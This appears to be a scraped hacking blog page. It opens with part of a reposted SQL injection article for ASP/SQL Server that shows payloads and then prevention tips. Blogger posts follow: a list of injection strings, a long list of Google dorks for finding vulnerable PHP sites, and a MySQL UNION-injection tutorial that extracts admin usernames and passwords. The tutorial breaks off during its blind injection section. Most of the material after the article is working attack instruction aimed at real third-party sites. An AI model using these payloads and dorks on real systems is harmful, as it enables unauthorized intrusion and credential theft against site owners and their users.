<br /><br />use myDB <br />go <br /><br />create table users <br />( <br />userId int identity(1,1) not null, <br />userName varchar(50) not null, <br />userPass varchar(20) not null <br />) <br /><br />insert into users(userName, userPass) values('john', 'doe') <br />insert into users(userName, userPass) values('admin', 'wwz04ff') <br />insert into users(userName, userPass) values('fsmith', 'mypassword')<br /><br />So if I entered a username of john and password of doe, then I would be presented with the text "Logged In". The query would look something like this:<br /><br />select count(*) from users where userName='john' and userPass='doe'<br /><br />There's nothing insecure or dangerous about this query... is there? Maybe not at first glance, but what about if I entered a username of john and a password of ' or 1=1 --<br /><br />The resultant query would now look like this:<br /><br />select count(*) from users where userName='john' and userPass='' <br />or 1=1 --'<br /><br />In the example above I've italicised the username and password so they are a bit easier to read, but basically what happens is that the query now only checks for any user with a username field of john. Instead of checking for a matching password, it now checks for an empty password, or the conditional equation of 1=1. This means that if the password field is empty OR 1 equals 1 (which it does), then a valid row has been found in the users table. Notice how the last quote is commented out with a single-line comment delimiter (--). This stops ASP from returning an error about any unclosed quotations.<br /><br />So with the login.asp script we created above, one row would be returned, and the text "Logged In" would be displayed. We could take this a bit further by doing the same thing to the username field, like this:<br /><br />Username: ' or 1=1 --- <br />Password: [Empty]<br /><br />This would execute the following query against the users table:<br /><br />select count(*) from users where userName='' or 1=1 --' and userPass=''<br /><br />The query above now returns a count of all rows in the user table. This is the perfect example of an SQL injection attack: adding code that manipulates the contents of a query to perform an undesired result.<br /><br />Another popular way to validate a user against a table of logins is to compare their details against the table, and retrieve the valid username from the database, like this:<br /><br />query = "select userName from users where userName='" & <br />userName & "' and userPass='" & password & "'" <br /><br />conn.Open "Provider=SQLOLEDB; Data Source=(local); <br />Initial Catalog=myDB; User Id=sa; Password=" <br />rs.activeConnection = conn <br />rs.open query <br /><br />if not rs.eof then <br />response.write "Logged In As " & rs.fields(0).value <br />else <br />response.write "Bad Credentials" <br />end if<br /><br />So, if we entered a username of john and a password of doe, then we would be presented with:<br /><br />Logged In As john<br /><br />However, if we used the following login credentials:<br /><br />Username: ' or 1=1 --- <br />Password: [Anything]<br /><br />Then we would also be logged in as John, because the row whose username field is John comes first in the list, based on the insert queries we saw earlier:<br /><br />insert into users(userName, userPass) values('john', 'doe') <br />insert into users(userName, userPass) values('admin', 'wwz04ff') <br />insert into users(userName, userPass) values('fsmith', 'mypassword') <br /><br />Injection Attack Examples<br />Forcing a login through a HTML form like the one we just saw on is a typical example of an SQL injection attack, and we'll look at ways to fix these types of attacks a little later.<br /><br />But first, I want to take a look at some examples of SQL injection attack executions. First of, let's stick with our example login form, which contains a username and password field.<br /><br />Example #1<br /><br />Microsoft SQL Server has its own dialect of SQL, which is called Transact SQL, or TSQL for short. We can exploit the power of TSQL in a number of ways to show how SQL injection attacks work. Consider the following query, which is based on the users table we created on the last page:<br /><br />select userName from users where userName='' having 1=1<br /><br />If you're an SQL buff, then you'll no doubt be aware that this query raises an error. We can easily make our login.asp page query our database with this query by using these login credentials:<br /><br />Username: ' having 1=1 --- <br /><br />Password: [Anything]<br /><br />When I click on the submit button to start the login process, the SQL query causes ASP to spit the following error to the browser:<br /><br />Microsoft OLE DB Provider for SQL Server (0x80040E14)<br /><br />Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.<br /><br />/login.asp, line 16<br /><br />Well well. It appears that this error message now tells the unauthorized user the name of one field from the database that we were trying to validate the login credentials against: users.userName. Using the name of this field, we can now use SQL Server's LIKE keyword to login with the following credentials:<br /><br />Username: ' or users.userName like 'a%' --- <br />Password: [Anything]<br /><br />Once again, this performs an injected SQL query against our users table:<br /><br />select userName from users where userName='' or <br />users.userName like 'a%' --' and userPass=''<br /><br />When we created the users table, we also created a user whose userName field was admin and userPass field was wwz04ff. Logging in with the username and password shown above uses SQL's like keyword to get the username. The query grabs the userName field of the first row whose userName field starts with a, which in this case is admin:<br /><br />Logged In As admin<br /><br />Example #2<br /><br />SQL Server, among other databases, delimits queries with a semi-colon. The use of a semi-colon allows multiple queries to be submitted as one batch and executed sequentially, for example:<br /><br />select 1; select 1+2; select 1+3;<br /><br />...would return three recordsets. The first would contain the value 1, the second the value 3, and the third the value 4, etc. So, if we logged in with the following credentials:<br /><br />Username: ' or 1=1; drop table users; -- <br />Password: [Anything]<br /><br />Then the query would execute in two parts. Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table, so that when we went to login next time, we would see the following error:<br /><br />Microsoft OLE DB Provider for SQL Server (0x80040E37) <br />Invalid object name 'users'. <br />/login.asp, line 16<br /><br />Example #3<br /><br />The last example relating to our login form that we'll consider is the execution of TSQL specific commands and extended stored procedures. Many Websites use the default system account (sa) user when logging into SQL Server from their ASP scripts or applications. By default, this user has access to all commands and can delete, rename, and add databases, tables, triggers, and more.<br /><br />One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which causes SQL Server to shutdown, immediately stopping the Windows service. To restart SQL server after this command is issued, you need to use the SQL service manager or some other method of restarting SQL server.<br /><br />Once again, this command can be exploited through our login example:<br /><br />Username: '; shutdown with nowait; -- <br />Password: [Anything]<br /><br />This would make our login.asp script run the following query:<br /><br />select userName from users where userName=''; <br />shutdown with nowait; --' and userPass=''<br /><br />If the user is set up as the default sa account, or the user has the required privileges, then SQL server will shut down, and will require a restart before it will function again.<br /><br />SQL Server also includes several extended stored procedures, which are basically special C++ DLL's that can contain powerful C/C++ code to manipulate the server, read directories and the registries, delete files, run the command prompt, etc. All extended stored procedures exist under the master database and are prefixed with "xp_".<br /><br />There are several extended stored procedures that can cause permanent damage to a system. We can execute an extended stored procedure using our login form with an injected command as the username, like this:<br /><br />Username: '; exec master..xp_xxx; -- <br />Password: [Anything]<br /><br />All we have to do is pick the appropriate extended stored procedure and replace xp_xxx with its name in the sample above. For example, if IIS was installed on the same machine as SQL Server (which is typical for small one/two man setups), then we could restart it by using the xp_cmdshell extended stored procedure (which executes a command string as an operating-system command) and IIS reset. All we need to do is enter the following user credentials into our getlogin.asp page:<br /><br />Username: '; exec master..xp_cmdshell 'iisreset'; -- <br />Password: [Anything]<br /><br />This would send the following query to SQL Server:<br /><br />select userName from users where userName=''; <br />exec master..xp_cmdshell 'iisreset'; --' and userPass=''<br /><br />As I'm sure you'll agree, this can cause serious problems, and with the right commands, can cause an entire Website to malfunction.<br /><br />Example #4<br /><br />OK, time to move away from looking at the login.asp script and onto another common method to perform an SQL injection attack.<br /><br />How many times have you been to a Website that sells you favourite gear and seen a URL like this:<br /><br />www.mysite.com/products.asp?productId=2<br /><br />Obviously the 2 is the ID of the product, and a lot of sites would simply build a query around the productId querystring variable, like this:<br /><br />Select prodName from products where id = 2<br /><br />Before we continue, let's assume that we have the following table and rows setup on our SQL server:<br /><br />create table products <br />( <br />id int identity(1,1) not null, <br />prodName varchar(50) not null, <br />) <br /><br />insert into products(prodName) values('Pink Hoola Hoop') <br />insert into products(prodName) values('Green Soccer Ball') <br />insert into products(prodName) values('Orange Rocking Chair')<br /><br />Let's also assume that we have created the following ASP script, and called it products.asp:<br /><br /><% <br /><br />dim prodId <br />prodId = Request.QueryString("productId") <br /><br />set conn = server.createObject("ADODB.Connection") <br />set rs = server.createObject("ADODB.Recordset") <br /><br />query = "select prodName from products where id = " & prodId <br /><br />conn.Open "Provider=SQLOLEDB; Data Source=(local); <br />Initial Catalog=myDB; User Id=sa; Password=" <br />rs.activeConnection = conn <br />rs.open query <br /><br />if not rs.eof then <br />response.write "Got product " & rs.fields("prodName").value <br />else <br />response.write "No product found" <br />end if <br /><br />%><br /><br />So if we visited products.asp in the browser with the following URL:<br /><br />http://localhost/pro...asp?productId=1<br /><br />...we'd see the following line of text in our browser:<br /><br />Got product Pink Hoola Hoop<br /><br />Notice that this time around, product.asp returns a field from the recordset based on the field's name:<br /><br />response.write "Got product " & rs.fields("prodName").value<br /><br />Although this may seem more secure, it really isn't, and we can still manipulate the database just as we have in our last three examples. Notice also that this time the WHERE clause of the query is based on a numerical value:<br /><br />query = "select prodName from products where id = " & prodId<br /><br />In order for the products.asp page to function correctly, all that's required is a numerical product Id passed as the productId querystring variable. Getting around this isn't too much of a problem, however. Consider the following URL to products.asp:<br /><br />http://localhost/pro...Id=0%20or%201=1<br /><br />Each %20 in the URL represents a URL-encoded space character, so the URL really looks like this:<br /><br />http://localhost/pro...asp?productId=0 or 1=1<br /><br />When used in conjunction with products.asp, the query looks like this:<br /><br />select prodName from products where id = 0 or 1=1<br /><br />Using a bit of know-how and some URL-encoding, we can just as easily pull the name of the products field from the products table:<br /><br />http://localhost/pro...%20having%201=1<br /><br />This would produce the following error in the browser:<br /><br />Microsoft OLE DB Provider for SQL Server (0x80040E14) <br /><br />Column 'products.prodName' is invalid in the select <br />list because it is not contained in an aggregate <br />function and there is no GROUP BY clause. <br /><br />/products.asp, line 13<br /><br />Now, we can take the name of the products field (products.prodName) and call up the following URL in the browser:<br /><br />http://localhost/pro...into%20products <br />(prodName)%20values(left(@@version,50))<br /><br />Here's the query without the URL-encoded spaces:<br /><br />http://localhost/pro...ductId=0;insert into <br />products(prodName) values(left(@@version,50))<br /><br />Basically it returns "No product found", however it also runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable (which contains the details of SQL Server's version, build, etc.) as a new record in the products table.<br /><br />In a real-life situation, you would obviously have to exploit the products table more than this as it would contain dozens of other fields, however the methods would remain the same.<br /><br />To get to the version, it's now a simple matter of calling up the products.asp page with the value of the latest entry in the products table, like this:<br /><br />http://localhost/pro...select%20max(id) <br />%20from%20products)<br /><br />What this query does is grab the ID of the latest row added to the products table using SQL server's MAX function. The result outputs the new row that contains the SQL server version details:<br /><br />Got product Microsoft SQL Server 2000 - 8.00.534 (Intel X86)<br /><br />This method of injection can be used to perform numerous tasks. However the point of this article was to give tips on how to prevent SQL injection attacks, which is what we will look at next. <br /><br />Preventing SQL Injection Attacks<br />If you design your scripts and applications with care, SQL injection attacks can be avoided most of the time. There are a number of things that we as developers can do to reduce our site's susceptibility to attack. Here's a list (in no particular order) of our options:<br /><br />Limit User Access<br /><br />The default system account (sa) for SQL server 2000 should never be used because of its unrestricted nature. You should always setup specific accounts for specific purposes.<br /><br />For example, if you run a database that lets users of your site view and order products, then you should set up a user called webUser_public that has SELECT rights on the products table, and INSERT rights only on the orders table.<br /><br />If you don't make use of extended stored procedures, or have unused triggers, stored procedures, user-defined functions, etc, then remove them, or move them to an isolated server. Most extremely damaging SQL injection attacks attempt to make use of several extended stored procedures such as xp_cmdshell and xp_grantlogin, so by removing them, you're theoretically blocking the attack before it can occur.<br /><br />Escape Quotes<br /><br />As we've seen from the examples discussed above, the majority of injection attacks require the user of single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you're greatly reducing the chance of an injection attack succeeding.<br /><br />Using ASP, it's a simple matter of creating a generic replace function that will handle the single quotes automatically, like this:<br /><br /><% <br /><br />function stripQuotes(strWords) <br />stripQuotes = replace(strWords, "'", "''") <br />end function <br /><br />%><br /><br />Now if we use the stripQuotes function in conjunction with our first query for example, then it would go from this:<br /><br />select count(*) from users where userName='john' and <br />userPass='' or 1=1 --'<br /><br />...to this:<br /><br />select count(*) from users where userName='john'' and <br />userPass=''' or 1=1 --'<br /><br />This, in effect, stops the injection attack from taking place, because the clause for the WHERE query now requires both the userName and userPass fields to be valid.<br /><br />Remove Culprit Characters/Character Sequences<br /><br />As we've seen in this article, certain characters and character sequences such as ;, --, select, insert and xp_ can be used to perform an SQL injection attack. By removing these characters and character sequences from user input before we build a query, we can help reduce the chance of an injection attack even further.<br /><br />As with the single quote solution, we just need a basic function to handle all of this for us:<br /><br /><% <br /><br />function killChars(strWords) <br /><br />dim badChars <br />dim newChars <br /><br />badChars = array("select", "drop", ";", "--", "insert", <br />"delete", "xp_") <br />newChars = strWords <br /><br />for i = 0 to uBound(badChars) <br />newChars = replace(newChars, badChars(i), "") <br />next <br /><br />killChars = newChars <br /><br />end function <br /><br />%><br /><br />Using stripQuotes in combination with killChars greatly removes the chance of any SQL injection attack from succeeding. So if we had the query:<br /><br />select prodName from products where id=1; xp_cmdshell 'format <br />c: /q /yes '; drop database myDB; --<br /><br />and ran it through stripQuotes and then killChars, it would end up looking like this:<br /><br />prodName from products where id=1 cmdshell ''format c: <br />/q /yes '' database myDB<br /><br />...which is basically useless, and will return no records from the query.<br /><br />Limit the Length of User Input<br /><br />It's no good having a text box on a form that can accept 50 characters if the field you'll compare it against can only accept 10. By keeping all text boxes and form fields as short as possible, you're taking away the number of characters that can be used to formulate an SQL injection attack.<br /><br />If you're accepting a querystring value for a product ID or the like, always use a function to check if the value is actually numeric, such as the IsNumeric() function for ASP. If the value isn't numeric, then either raise an error or redirect the user to another page where they can choose a product.<br /><br />Also, always try to post your forms with the method attribute set to POST, so clued-up users don't get any ideas --- they might if they saw your form variables tacked onto the end of the URL. <br /><br />Conclusion<br />In this article we've seen what an SQL injection attack is and also how to tamper with forms and URLs to product the results of an attack.<br /><br />It's not always possible to guard against every type of SQL injection attack, however, hopefully you now know about the various types of SQL injection attacks that exist and have also planned ways to combat them on your servers.<br /><br />Although we've only looked at SQL injection attacks with Microsoft SQL server in this article, keep in mind that no database is safe: SQL injection attacks can also occur on MySQL and Oracle database servers -- among others.<br /><br />------ This Article belongs to : http://articles.site...on-attacks-safe/ ------ <br /><br />Here is the a Complete List of SQL Injection Strings & how to use it to find vulnerable sites (this is not belong to the article above ) : <br />[code]inurl:index.php?id=<br />inurl:trainers.php?id=<br />inurl:buy.php?category=<br />inurl:article.php?ID=<br />inurl:play_old.php?id=<br />inurl:declaration_more.php?decl_id=<br />inurl:pageid=<br />inurl:games.php?id=<br />inurl:page.php?file=<br />inurl:newsDetail.php?id=<br />inurl:gallery.php?id=<br />...................................................<br /><br />admin'--<br />' or 0=0 --<br />" or 0=0 --<br />or 0=0 --<br />' or 0=0 #<br />" or 0=0 #<br />or 0=0 #<br />' or 'x'='x<br />" or "x"="x<br />') or ('x'='x<br />' or 1=1--<br />" or 1=1--<br />or 1=1--<br />' or a=a--<br />" or "a"="a<br />') or ('a'='a<br />") or ("a"="a<br />hi" or "a"="a<br />hi" or 1=1 --<br />hi' or 1=1 --<br />hi' or 'a'='a<br />hi') or ('a'='a<br />hi") or ("a"="a<br /><br />use those 2 together in front of the (=) sign like this : <br /><br />www.somesiteindex.php?id= admin'-- <br />or<br />www.somesiteplay_old.php?id="a"="a<br /><br />if you get error like this (you have an error in your sql syntax ; check the manual that correspond to you MYSQl ) , so this site is vulnerable to SQLi .<br /><br />I hope we always share good stuff here .<br />http://www.mysite.com/products.asp?productId=2<br />www.mysite.com<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />pls post ur queries.....!!!! if any occurs ....n wait for next update !!! from hackeramit4u@gmail.com<br />____________________________________________________________________________</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-65905385955297797822011-02-09T21:38:00.000-08:002011-06-27T20:13:52.752-07:00Full SQL Injection Tutorial (MySQL) Dorks<div dir="ltr" style="text-align: left;" trbidi="on">inurl:trainers.php?id=<br />inurl:buy.php?category=<br />inurl:article.php?ID=<br />inurl:play_old.php?id=<br />inurl:declaration_more.php?decl_id=<br />inurl:pageid=<br />inurl:games.php?id=<br />inurl:page.php?file=<br />inurl:newsDetail.php?id=<br />inurl:gallery.php?id=<br />inurl:article.php?id=<br />inurl:show.php?id=<br />inurl:staff_id=<br />inurl:newsitem.php?num=<br />inurl:readnews.php?id=<br />inurl:top10.php?cat=<br />inurl:historialeer.php?num=<br />inurl:reagir.php?num=<br />inurl:Stray-Questions-View.php?num=<br />inurl:forum_bds.php?num=<br />inurl:game.php?id=<br />inurl:view_product.php?id=<br />inurl:newsone.php?id=<br />inurl:sw_comment.php?id=<br />inurl:news.php?id=<br />inurl:avd_start.php?avd=<br />inurl:event.php?id=<br />inurl:product-item.php?id=<br />inurl:sql.php?id=<br />inurl:news_view.php?id=<br />inurl:select_biblio.php?id=<br />inurl:humor.php?id=<br />inurl:aboutbook.php?id=<br />inurl:ogl_inet.php?ogl_id=<br />inurl:fiche_spectacle.php?id=<br />inurl:communique_detail.php?id=<br />inurl:sem.php3?id=<br />inurl:kategorie.php4?id=<br />inurl:news.php?id=<br />inurl:index.php?id=<br />inurl:faq2.php?id=<br />inurl:show_an.php?id=<br />inurl:preview.php?id=<br />inurl:loadpsb.php?id=<br />inurl:opinions.php?id=<br />inurl:spr.php?id=<br />inurl:pages.php?id=<br />inurl:announce.php?id=<br />inurl:clanek.php4?id=<br />inurl:participant.php?id=<br />inurl:download.php?id=<br />inurl:main.php?id=<br />inurl:review.php?id=<br />inurl:chappies.php?id=<br />inurl:read.php?id=<br />inurl:prod_detail.php?id=<br />inurl:viewphoto.php?id=<br />inurl:article.php?id=<br />inurl:person.php?id=<br />inurl:productinfo.php?id=<br />inurl:showimg.php?id=<br />inurl:view.php?id=<br />inurl:website.php?id=<br />inurl:hosting_info.php?id=<br />inurl:gallery.php?id=<br />inurl:rub.php?idr=<br />inurl:view_faq.php?id=<br />inurl:artikelinfo.php?id=<br />inurl:detail.php?ID=<br />inurl:index.php?=<br />inurl:profile_view.php?id=<br />inurl:category.php?id=<br />inurl:publications.php?id=<br />inurl:fellows.php?id=<br />inurl:downloads_info.php?id=<br />inurl:prod_info.php?id=<br />inurl:shop.php?do=part&id=<br />inurl:productinfo.php?id=<br />inurl:collectionitem.php?id=<br />inurl:band_info.php?id=<br />inurl:product.php?id=<br />inurl:releases.php?id=<br />inurl:ray.php?id=<br />inurl:produit.php?id=<br />inurl:pop.php?id=<br />inurl:shopping.php?id=<br />inurl:productdetail.php?id=<br />inurl:post.php?id=<br />inurl:viewshowdetail.php?id=<br />inurl:clubpage.php?id=<br />inurl:memberInfo.php?id=<br />inurl:section.php?id=<br />inurl:theme.php?id=<br />inurl:page.php?id=<br />inurl:shredder-categories.php?id=<br />inurl:tradeCategory.php?id=<br />inurl:product_ranges_view.php?ID=<br />inurl:shop_category.php?id=<br />inurl:transcript.php?id=<br />inurl:channel_id=<br />inurl:item_id=<br />inurl:newsid=<br />inurl:trainers.php?id=<br />inurl:news-full.php?id=<br />inurl:news_display.php?getid=<br />inurl:index2.php?option=<br />inurl:readnews.php?id=<br />inurl:top10.php?cat=<br />inurl:newsone.php?id=<br />inurl:event.php?id=<br />inurl:product-item.php?id=<br />inurl:sql.php?id=<br />inurl:aboutbook.php?id=<br />inurl:preview.php?id=<br />inurl:loadpsb.php?id=<br />inurl:pages.php?id=<br />inurl:material.php?id=<br />inurl:clanek.php4?id=<br />inurl:announce.php?id=<br />inurl:chappies.php?id=<br />inurl:read.php?id=<br />inurl:viewapp.php?id=<br />inurl:viewphoto.php?id=<br />inurl:rub.php?idr=<br />inurl:galeri_info.php?l=<br />inurl:review.php?id=<br />inurl:iniziativa.php?in=<br />inurl:curriculum.php?id=<br />inurl:labels.php?id=<br />inurl:story.php?id=<br />inurl:look.php?ID=<br />inurl:newsone.php?id=<br />inurl:aboutbook.php?id=<br />inurl:material.php?id=<br />inurl:opinions.php?id=<br />inurl:announce.php?id=<br />inurl:rub.php?idr=<br />inurl:galeri_info.php?l=<br />inurl:tekst.php?idt=<br />inurl:newscat.php?id=<br />inurl:newsticker_info.php?idn=<br />inurl:rubrika.php?idr=<br />inurl:rubp.php?idr=<br />inurl:offer.php?idf=<br />inurl:art.php?idm=<br />inurl:title.php?id= <br />buy.php?category=<br />article.php?ID=<br />play_old.php?id=<br />declaration_more.php?decl_id=<br />Pageid=<br />games.php?id=<br />page.php?file=<br />newsDetail.php?id=<br />gallery.php?id=<br />article.php?id=<br />play_old.php?id=<br />show.php?id=<br />staff_id=<br />newsitem.php?num=<br />readnews.php?id=<br />top10.php?cat=<br />historialeer.php?num=<br />reagir.php?num=<br />forum_bds.php?num=<br />game.php?id=<br />view_product.php?id=<br />newsone.php?id=<br />sw_comment.php?id=<br />news.php?id=<br />avd_start.php?avd=<br />event.php?id=<br />product-item.php?id=<br />sql.php?id=<br />news_view.php?id=<br />select_biblio.php?id=<br />humor.php?id=<br />aboutbook.php?id=<br />fiche_spectacle.php?id=<br />communique_detail.php?id=<br />sem.php3?id=<br />kategorie.php4?id=<br />faq2.php?id=<br />show_an.php?id=<br />preview.php?id=<br />loadpsb.php?id=<br />opinions.php?id=<br />spr.php?id=<br />pages.php?id=<br />announce.php?id=<br />clanek.php4?id=<br />participant.php?id=<br />download.php?id=<br />main.php?id=<br />review.php?id=<br />chappies.php?id=<br />read.php?id=<br />prod_detail.php?id=<br />viewphoto.php?id=<br />article.php?id=<br />play_old.php?id=<br />declaration_more.php?decl_id=<br />category.php?id=<br />publications.php?id=<br />fellows.php?id=<br />downloads_info.php?id=<br />prod_info.php?id=<br />shop.php?do=part&id=<br />Productinfo.php?id=<br />website.php?id=<br />Productinfo.php?id=<br />showimg.php?id=<br />view.php?id=<br />rub.php?idr=<br />view_faq.php?id=<br />artikelinfo.php?id=<br />detail.php?ID=<br />collectionitem.php?id=<br />band_info.php?id=<br />product.php?id=<br />releases.php?id=<br />ray.php?id=<br />produit.php?id=<br />pop.php?id=<br />shopping.php?id=<br />productdetail.php?id=<br />post.php?id=<br />viewshowdetail.php?id=<br />clubpage.php?id=<br />memberInfo.php?id=<br />section.php?id=<br />theme.php?id=<br />page.php?id=<br />shredder-categories.php?id=<br />tradeCategory.php?id=<br />shop_category.php?id=<br />transcript.php?id=<br />channel_id=<br />item_id=<br />newsid=<br />trainers.php?id=<br />buy.php?category=<br />article.php?ID=<br />play_old.php?id=<br />iniziativa.php?in=<br />detail_new.php?id=<br />tekst.php?idt=<br />newscat.php?id=<br />newsticker_info.php?idn=<br />rubrika.php?idr=<br />rubp.php?idr=<br />offer.php?idf=<br />hotel.php?id=<br />art.php?idm=<br />title.php?id=<br />look.php?ID=<br />story.php?id=<br />labels.php?id=<br />review.php?id=<br />chappies.php?id=<br />news-full.php?id=<br />news_display.php?getid=<br />index2.php?option=<br />ages.php?id=<br />"id=" & intext:"Warning: mysql_fetch_assoc()<br />"id=" & intext:"Warning: mysql_fetch_array()<br />"id=" & intext:"Warning: mysql_num_rows()<br />"id=" & intext:"Warning: session_start()<br />"id=" & intext:"Warning: getimagesize()<br />"id=" & intext:"Warning: Unknown()<br />"id=" & intext:"Warning: pg_exec()<br />"id=" & intext:"Warning: array_merge()<br />"id=" & intext:"Warning: mysql_result()<br />"id=" & intext:"Warning: mysql_num_rows()<br />"id=" & intext:"Warning: mysql_query()<br />"id=" & intext:"Warning: filesize()<br />"id=" & intext:"Warning: require()</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-54942585874499174682011-02-09T21:33:00.000-08:002011-06-27T20:13:52.752-07:00Full SQL Injection Tutorial (MySQL)<div dir="ltr" style="text-align: left;" trbidi="on">In this tutorial i will describe how sql injection works and how to<br />use it to get some useful information.<br /><br /><br />First of all: What is SQL injection?<br /><br />It's one of the most common vulnerability in web applications today.<br />It allows attacker to execute database query in url and gain access<br />to some confidential information etc...(in shortly).<br /><br /><br />1.SQL Injection (classic or error based or whatever you call it) :D<br /><br />2.Blind SQL Injection (the harder part)<br /><br /><br />So let's start with some action :D<br /><br /><br />1). Check for vulnerability<br /><br />Let's say that we have some site like this<br /><br />http://www.site.com/news.php?id=5<br /><br />Now to test if is vulrnable we add to the end of url ' (quote),<br /><br />and that would be http://www.site.com/news.php?id=5'<br /><br />so if we get some error like<br />"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."<br />or something similar<br /><br />that means is vulrnable to sql injection :)<br /><br />2). Find the number of columns<br /><br />To find number of columns we use statement ORDER BY (tells database how to order the result)<br /><br />so how to use it? Well just incrementing the number until we get an error.<br /><br />http://www.site.com/news.php?id=5 order by 1/* <-- no error<br /><br />http://www.site.com/news.php?id=5 order by 2/* <-- no error<br /><br />http://www.site.com/news.php?id=5 order by 3/* <-- no error<br /><br />http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)<br /><br />that means that the it has 3 columns, cause we got an error on 4.<br /><br />3). Check for UNION function<br /><br />With union we can select more data in one sql statement.<br /><br />so we have<br /><br />http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )<br /><br />if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)<br /><br />4). Check for MySQL version<br /><br />http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --<br />it's a comment and it's important for our query to work properly.<br /><br />let say that we have number 2 on the screen, now to check for version<br />we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.<br /><br />it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*<br /><br />if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."<br /><br />i didn't see any paper covering this problem, so i must write it :)<br /><br />what we need is convert() function<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*<br /><br />or with hex() and unhex()<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*<br /><br />and you will get MySQL version :D<br /><br />5). Getting table and column name<br /><br />well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.<br />we must guess table and column name in most cases.<br /><br />common table names are: user/s, admin/s, member/s ...<br /><br />common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...<br /><br />i.e would be<br /><br />http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)<br /><br />we know that table admin exists...<br /><br />now to check column names.<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)<br /><br />we get username displayed on screen, example would be admin, or superadmin etc...<br /><br />now to check if column password exists<br /><br />http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)<br /><br />we seen password on the screen in hash or plain-text, it depends of how the database is set up :)<br /><br />i.e md5 hash, mysql hash, sha1...<br /><br />now we must complete query to look nice :)<br /><br />for that we can use concat() function (it joins strings)<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*<br /><br />Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)<br /><br />(there is another way for that, char(58), ascii value for : )<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*<br /><br />now we get dislayed username:password on screen, i.e admin:admin or admin:somehash<br /><br />when you have this, you can login like admin or some superuser :D<br /><br />if can't guess the right table name, you can always try mysql.user (default)<br /><br />it has user i password columns, so example would be<br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*<br /><br />6). MySQL 5<br /><br />Like i said before i'm gonna explain how to get table and column names<br />in MySQL > 5.<br /><br />For this we need information_schema. It holds all tables and columns in database.<br /><br />to get tables we use table_name and information_schema.tables.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*<br /><br />here we replace the our number 2 with table_name to get the first table from information_schema.tables<br /><br />displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*<br /><br />note that i put 0,1 (get 1 result starting from the 0th)<br /><br />now to view the second table, we change limit 0,1 to limit 1,1<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*<br /><br />the second table is displayed.<br /><br />for third table we put limit 2,1<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*<br /><br />keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D<br /><br />To get the column names the method is the same.<br /><br />here we use column_name and information_schema.columns<br /><br />the method is same as above so example would be<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*<br /><br />the first column is diplayed.<br /><br />the second one (we change limit 0,1 to limit 1,1)<br /><br />ie.<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*<br /><br />the second column is displayed, so keep incrementing until you get something like<br /><br />username,user,login, password, pass, passwd etc... :D<br /><br />if you wanna display column names for specific table use this query. (where clause)<br /><br />let's say that we found table users.<br /><br />i.e<br /><br />http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*<br /><br />now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.<br /><br />Note that this won't work if the magic quotes is ON.<br /><br />let's say that we found colums user, pass and email.<br /><br />now to complete query to put them all together :D<br /><br />for that we use concat() , i decribe it earlier.<br /><br />i.e<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*<br /><br />what we get here is user:pass:email from table users.<br /><br />example: admin:hash:whatever@blabla.com<br /><br /><br />That's all in this part, now we can proceed on harder part :)<br /><br /><br /><br />2. Blind SQL Injection<br /><br />Blind injection is a little more complicated the classic injection but it can be done :D<br /><br />I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D<br /><br />Let's start with advanced stuff.<br /><br />I will be using our example<br /><br />http://www.site.com/news.php?id=5<br /><br />when we execute this, we see some page and articles on that page, pictures etc...<br /><br />then when we want to test it for blind sql injection attack<br /><br />http://www.site.com/news.php?id=5 and 1=1 <--- this is always true<br /><br />and the page loads normally, that's ok.<br 